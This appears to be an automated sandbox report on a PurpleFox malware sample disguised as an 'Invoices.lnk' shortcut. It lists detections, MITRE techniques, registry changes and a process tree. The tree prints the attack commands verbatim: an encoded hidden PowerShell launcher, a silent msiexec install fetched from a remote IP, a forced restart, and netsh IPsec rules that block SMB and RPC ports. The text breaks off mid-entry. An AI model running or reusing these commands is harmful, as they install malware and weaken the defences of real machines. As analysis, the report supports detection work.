purplefox | 30795a87e95ccdb4a5045215607c9a4c53e6061d9c6b893beaaccd614025b116

Analysis

max time kernel
124s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
10-07-2023 23:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoices.lnk
Size

1KB
MD5

cbe684367925c53f7a9026f252011724
SHA1

ec8cf089aa811c009683c8ee4e5183750ef0452e
SHA256

744abbb0d8d00bc5eb058ce47ffffa971c7dbd03a9b204c67284080e99d982da
SHA512

7d06394b39ee7b7c9570307fd1f6349fa440ed3d21f8f1ee67ae35c9b3bacabe214b47830e498e56f2fd51f02de44ec2e1625de21abdce5af5fec69f139fdad0

Score

10^/10

purplefox discovery evasion rootkit trojan

Malware Config

Signatures

Detect PurpleFox MSI 1 IoCs

Detect PurpleFox MSI.

rootkit

Processes:

resource	yara_rule
C:\Windows\Installer\MSI2A38.tmp	purplefox_msi

PurpleFox
PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.
rootkit trojan purplefox
Blocklisted process makes network request 1 IoCs

Processes:

msiexec.exe

flow pid process

28 536 msiexec.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Control Panel\International\Geo\Nation cmd.exe
Loads dropped DLL 5 IoCs

Processes:

MsiExec.exe

pid process

3364 MsiExec.exe
3364 MsiExec.exe
3364 MsiExec.exe
3364 MsiExec.exe
3364 MsiExec.exe
Modifies file permissions 1 TTPs 6 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid process

4276 takeown.exe
532 takeown.exe
704 takeown.exe
2248 takeown.exe
208 takeown.exe
900 takeown.exe
Use of msiexec (install) with remote resource 3 IoCs

Processes:

msiexec.exemsiexec.exemsiexec.exe

pid process

2932 msiexec.exe
2620 msiexec.exe
2572 msiexec.exe

flow	pid	process
28	536	msiexec.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
3364	MsiExec.exe
3364	MsiExec.exe
3364	MsiExec.exe
3364	MsiExec.exe
3364	MsiExec.exe

pid	process
4276	takeown.exe
532	takeown.exe
704	takeown.exe
2248	takeown.exe
208	takeown.exe
900	takeown.exe

pid	process
2932	msiexec.exe
2620	msiexec.exe
2572	msiexec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exePowerShell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 12 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI33FE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI34AC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3598.tmp	msiexec.exe
File created	C:\Windows\.xml	msiexec.exe
File created	C:\Windows\dbcode86mk.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2A38.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3351.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI341E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI344E.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

704 sc.exe
3904 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

244 3428 WerFault.exe tvp.exe

pid	process
704	sc.exe
3904	sc.exe

pid	pid_target	process	target process
244	3428	WerFault.exe	tvp.exe

Modifies data under HKEY_USERS 51 IoCs

Processes:

powershell.exeMsiExec.exemsiexec.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f	msiexec.exe

Modifies registry class 10 IoCs

Processes:

tvp.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open	tvp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe %1"	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell	tvp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe -dvd %1"	tvp.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

PowerShell.exepowershell.exepowershell.exenetsh.exemsiexec.exepowershell.exe

pid	process
764	PowerShell.exe
764	PowerShell.exe
2752	powershell.exe
2752	powershell.exe
2272	powershell.exe
2272	powershell.exe
5060	netsh.exe
5060	netsh.exe
2272	powershell.exe
2752
5060	netsh.exe
536	msiexec.exe
536	msiexec.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

PowerShell.exenetsh.exepowershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeDebugPrivilege	764	PowerShell.exe
Token: SeDebugPrivilege	5060	netsh.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeShutdownPrivilege	2932	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2932	msiexec.exe
Token: SeShutdownPrivilege	2620	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2620	msiexec.exe
Token: SeShutdownPrivilege	2572	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2572	msiexec.exe
Token: SeSecurityPrivilege	536	msiexec.exe
Token: SeCreateTokenPrivilege	2932	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2932	msiexec.exe
Token: SeLockMemoryPrivilege	2932	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2932	msiexec.exe
Token: SeMachineAccountPrivilege	2932	msiexec.exe
Token: SeTcbPrivilege	2932	msiexec.exe
Token: SeSecurityPrivilege	2932	msiexec.exe
Token: SeTakeOwnershipPrivilege	2932	msiexec.exe
Token: SeLoadDriverPrivilege	2932	msiexec.exe
Token: SeSystemProfilePrivilege	2932	msiexec.exe
Token: SeSystemtimePrivilege	2932	msiexec.exe
Token: SeProfSingleProcessPrivilege	2932	msiexec.exe
Token: SeIncBasePriorityPrivilege	2932	msiexec.exe
Token: SeCreatePagefilePrivilege	2932	msiexec.exe
Token: SeCreatePermanentPrivilege	2932	msiexec.exe
Token: SeBackupPrivilege	2932	msiexec.exe
Token: SeRestorePrivilege	2932	msiexec.exe
Token: SeShutdownPrivilege	2932	msiexec.exe
Token: SeDebugPrivilege	2932	msiexec.exe
Token: SeAuditPrivilege	2932	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2932	msiexec.exe
Token: SeChangeNotifyPrivilege	2932	msiexec.exe
Token: SeRemoteShutdownPrivilege	2932	msiexec.exe
Token: SeUndockPrivilege	2932	msiexec.exe
Token: SeSyncAgentPrivilege	2932	msiexec.exe
Token: SeEnableDelegationPrivilege	2932	msiexec.exe
Token: SeManageVolumePrivilege	2932	msiexec.exe
Token: SeImpersonatePrivilege	2932	msiexec.exe
Token: SeCreateGlobalPrivilege	2932	msiexec.exe
Token: SeRestorePrivilege	536	msiexec.exe
Token: SeTakeOwnershipPrivilege	536	msiexec.exe
Token: SeCreateTokenPrivilege	2620	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2620	msiexec.exe
Token: SeLockMemoryPrivilege	2620	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2620	msiexec.exe
Token: SeMachineAccountPrivilege	2620	msiexec.exe
Token: SeTcbPrivilege	2620	msiexec.exe
Token: SeSecurityPrivilege	2620	msiexec.exe
Token: SeTakeOwnershipPrivilege	2620	msiexec.exe
Token: SeLoadDriverPrivilege	2620	msiexec.exe
Token: SeSystemProfilePrivilege	2620	msiexec.exe
Token: SeSystemtimePrivilege	2620	msiexec.exe
Token: SeProfSingleProcessPrivilege	2620	msiexec.exe
Token: SeIncBasePriorityPrivilege	2620	msiexec.exe
Token: SeCreatePagefilePrivilege	2620	msiexec.exe
Token: SeCreatePermanentPrivilege	2620	msiexec.exe
Token: SeBackupPrivilege	2620	msiexec.exe
Token: SeRestorePrivilege	2620	msiexec.exe
Token: SeShutdownPrivilege	2620	msiexec.exe
Token: SeDebugPrivilege	2620	msiexec.exe
Token: SeAuditPrivilege	2620	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2620	msiexec.exe
Token: SeChangeNotifyPrivilege	2620	msiexec.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

tvp.exe

pid process

3428 tvp.exe
3428 tvp.exe
3428 tvp.exe

pid	process
3428	tvp.exe
3428	tvp.exe
3428	tvp.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeexplorer.exetvp.exePowerShell.exepowershell.exenetsh.exemsiexec.exeMsiExec.exe

description	pid	process	target process
PID 2208 wrote to memory of 1504	2208	cmd.exe	explorer.exe
PID 2208 wrote to memory of 1504	2208	cmd.exe	explorer.exe
PID 1956 wrote to memory of 3428	1956	explorer.exe	tvp.exe
PID 1956 wrote to memory of 3428	1956	explorer.exe	tvp.exe
PID 1956 wrote to memory of 3428	1956	explorer.exe	tvp.exe
PID 3428 wrote to memory of 764	3428	tvp.exe	PowerShell.exe
PID 3428 wrote to memory of 764	3428	tvp.exe	PowerShell.exe
PID 3428 wrote to memory of 764	3428	tvp.exe	PowerShell.exe
PID 764 wrote to memory of 2752	764	PowerShell.exe	powershell.exe
PID 764 wrote to memory of 2752	764	PowerShell.exe	powershell.exe
PID 764 wrote to memory of 2752	764	PowerShell.exe	powershell.exe
PID 764 wrote to memory of 5060	764	PowerShell.exe	powershell.exe
PID 764 wrote to memory of 5060	764	PowerShell.exe	powershell.exe
PID 764 wrote to memory of 5060	764	PowerShell.exe	powershell.exe
PID 764 wrote to memory of 2272	764	PowerShell.exe	powershell.exe
PID 764 wrote to memory of 2272	764	PowerShell.exe	powershell.exe
PID 764 wrote to memory of 2272	764	PowerShell.exe	powershell.exe
PID 2272 wrote to memory of 2932	2272	powershell.exe	msiexec.exe
PID 2272 wrote to memory of 2932	2272	powershell.exe	msiexec.exe
PID 2272 wrote to memory of 2932	2272	powershell.exe	msiexec.exe
PID 2752 wrote to memory of 2620	2752		msiexec.exe
PID 2752 wrote to memory of 2620	2752		msiexec.exe
PID 2752 wrote to memory of 2620	2752		msiexec.exe
PID 5060 wrote to memory of 2572	5060	netsh.exe	msiexec.exe
PID 5060 wrote to memory of 2572	5060	netsh.exe	msiexec.exe
PID 5060 wrote to memory of 2572	5060	netsh.exe	msiexec.exe
PID 536 wrote to memory of 3364	536	msiexec.exe	MsiExec.exe
PID 536 wrote to memory of 3364	536	msiexec.exe	MsiExec.exe
PID 536 wrote to memory of 3364	536	msiexec.exe	MsiExec.exe
PID 536 wrote to memory of 1072	536	msiexec.exe	MsiExec.exe
PID 536 wrote to memory of 1072	536	msiexec.exe	MsiExec.exe
PID 536 wrote to memory of 1072	536	msiexec.exe	MsiExec.exe
PID 1072 wrote to memory of 3940	1072	MsiExec.exe	powercfg.exe
PID 1072 wrote to memory of 3940	1072	MsiExec.exe	powercfg.exe
PID 1072 wrote to memory of 3940	1072	MsiExec.exe	powercfg.exe
PID 1072 wrote to memory of 1988	1072	MsiExec.exe	powershell.exe
PID 1072 wrote to memory of 1988	1072	MsiExec.exe	powershell.exe
PID 1072 wrote to memory of 1988	1072	MsiExec.exe	powershell.exe
PID 1072 wrote to memory of 2216	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 2216	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 2216	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4764	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4764	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4764	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 2956	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 2956	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 2956	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 3312	1072	MsiExec.exe	Conhost.exe
PID 1072 wrote to memory of 3312	1072	MsiExec.exe	Conhost.exe
PID 1072 wrote to memory of 3312	1072	MsiExec.exe	Conhost.exe
PID 1072 wrote to memory of 2248	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 2248	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 2248	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4920	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4920	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4920	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4416	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4416	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4416	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 5060	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 5060	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 5060	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4780	1072	MsiExec.exe	netsh.exe
PID 1072 wrote to memory of 4780	1072	MsiExec.exe	netsh.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Invoices.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\explorer.exe
"C:\Windows\explorer.exe" Res\tvp.exe
2⤵
PID:1504

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:1956

C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe
"C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe"
2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 664
3⤵
- Program crash
PID:244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
PowerShell -nop -exec bypass -w Hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMwA7ACQAaQArACsAKQANAAoAewANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAIAAnAG0AcwBpAGUAeABlAGMAIAAvAGkAIABoAHQAdABwADoALwAvADEAOAA1AC4AMgAzADcALgAyADEAOAAuADUAMwA6ADgAMAA4ADEALwBzAGUAdAB1AHAALgBqAHAAZwAgAC8AcQAnAA0ACgB9AA0ACgA=
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://185.237.218.53:8081/setup.jpg /q
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i http://185.237.218.53:8081/setup.jpg /q
5⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://185.237.218.53:8081/setup.jpg /q
4⤵
- Drops file in System32 directory
PID:5060

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i http://185.237.218.53:8081/setup.jpg /q
5⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://185.237.218.53:8081/setup.jpg /q
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i http://185.237.218.53:8081/setup.jpg /q
5⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3428 -ip 3428
1⤵
PID:4980

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:536

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 255F7B72785263C176FA06439ACEB3DB
2⤵
- Loads dropped DLL
PID:3364

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B0D9440B1645EB252A9A868B695F3028 E Global\MSI0000
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\SysWOW64\powercfg.exe
"C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
3⤵
PID:3940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force
3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1988

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye
3⤵
PID:2216

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1
3⤵
PID:4764

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
3⤵
PID:2956

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
3⤵
PID:3312

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
3⤵
PID:2248

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
3⤵
PID:4920

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
3⤵
PID:4416

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
3⤵
PID:4780

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
3⤵
PID:1480

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
3⤵
PID:5024

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
3⤵
PID:1508

C:\Windows\SysWOW64\netsh.exe
